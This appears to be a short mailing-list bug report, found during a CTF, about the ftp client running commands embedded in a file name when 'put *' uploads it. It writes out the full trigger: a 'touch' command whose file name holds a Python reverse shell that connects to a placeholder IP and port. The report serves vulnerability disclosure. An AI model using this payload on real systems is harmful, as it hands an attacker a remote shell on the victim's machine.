[Top][All Lists]

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

FTP client arbitrary code execution

From: John Zhau
Subject: FTP client arbitrary code execution
Date: Sun, 19 Sep 2021 19:04:31 +0700

I've found that with a certain file name, `ftp` executes code in the file name. The file is created with the following command

touch "|python3 -c 'import os,pty,socket;s=socket.socket();s.connect((\"YOUR_IP\",YOUR_PORT));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn(\"sh\")';echo .csv"

To get code to execute, simply have the file in the current directory (haven't tested with multiple files in the directory) and run `put *` to upload everything.

This bug was found while I was doing a CTF (capture the flag) challenge and I haven't been able to connect to the same server since for further testing.

reply via email to

[Prev in Thread] Current Thread [Next in Thread]